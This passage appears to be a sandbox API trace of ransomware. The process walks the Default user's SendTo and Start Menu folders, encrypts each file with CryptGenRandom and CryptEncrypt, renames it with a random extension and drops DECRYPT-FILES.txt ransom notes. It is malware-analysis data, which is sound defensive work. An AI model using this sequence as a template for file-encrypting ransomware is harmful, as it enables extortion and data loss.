CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.214] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.214] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.214] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.214] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.216] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.216] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.217] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.217] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.217] CloseHandle (hObject=0x44c) returned 1 [0088.217] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.217] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.218] CloseHandle (hObject=0x0) returned 0 [0088.218] CloseHandle (hObject=0x448) returned 1 [0088.218] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.219] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.219] GetTickCount () returned 0x114e7ef [0088.219] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.219] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.219] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.219] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.220] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.220] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget") returned 99 [0088.220] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.ldEb") returned 104 [0088.220] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.ldEb" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.ldeb"), dwFlags=0x0) returned 1 [0088.220] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.221] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.221] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.221] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0c568a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.221] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0088.221] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Desktop (create shortcut).DeskLink" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" [0088.221] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.221] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.222] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=7) returned 1 [0088.222] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.222] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.222] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.222] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.222] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.224] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.224] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.224] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.225] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.225] CloseHandle (hObject=0x44c) returned 1 [0088.225] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.225] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.226] CloseHandle (hObject=0x0) returned 0 [0088.226] CloseHandle (hObject=0x448) returned 1 [0088.226] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.226] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.226] GetTickCount () returned 0x114e7ef [0088.227] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.227] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.227] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.227] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.227] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.228] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink") returned 92 [0088.228] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ldEb") returned 97 [0088.228] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ldEb" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.ldeb"), dwFlags=0x0) returned 1 [0088.228] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.228] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.229] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.229] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xec18bec6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0088.229] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0088.229] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Documents.mydocs" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" [0088.229] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.229] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.229] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=0) returned 1 [0088.230] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0088.230] CloseHandle (hObject=0x0) returned 0 [0088.230] CloseHandle (hObject=0x448) returned 1 [0088.230] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.230] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3d802e42, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0088.230] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0088.231] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\jkbimi8.tmp" [0088.231] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.231] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.231] CloseHandle (hObject=0x0) returned 0 [0088.231] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.231] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c48085e, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 1 [0088.231] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0088.231] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Mail Recipient.MAPIMail" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" [0088.231] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.232] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.232] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=4) returned 1 [0088.232] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.232] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.233] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.233] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.233] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.234] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.235] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.235] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.235] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.235] CloseHandle (hObject=0x44c) returned 1 [0088.235] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.236] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.236] CloseHandle (hObject=0x0) returned 0 [0088.236] CloseHandle (hObject=0x448) returned 1 [0088.236] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.237] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.237] GetTickCount () returned 0x114e7ff [0088.237] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.237] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.237] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.237] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.238] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.238] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail") returned 81 [0088.238] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.YHpD") returned 86 [0088.238] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.YHpD" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.yhpd"), dwFlags=0x0) returned 1 [0088.238] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.239] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.239] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.239] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c48085e, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 0 [0088.239] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.239] CloseHandle (hObject=0x440) returned 1 [0088.239] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0088.239] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0088.239] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0088.239] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0088.239] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0088.240] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\jkbimi8.tmp") returned 74 [0088.240] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.240] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 62 [0088.240] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.240] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt") returned 80 [0088.240] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.240] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.243] CloseHandle (hObject=0x444) returned 1 [0088.244] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 62 [0088.244] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0088.244] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ca2b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ca2b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.244] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ca2b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ca2b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.244] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ca2b60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ca2b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ca2b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.244] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0088.244] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\jkbimi8.tmp" [0088.244] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.244] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\jkbimi8.tmp" (normalized: 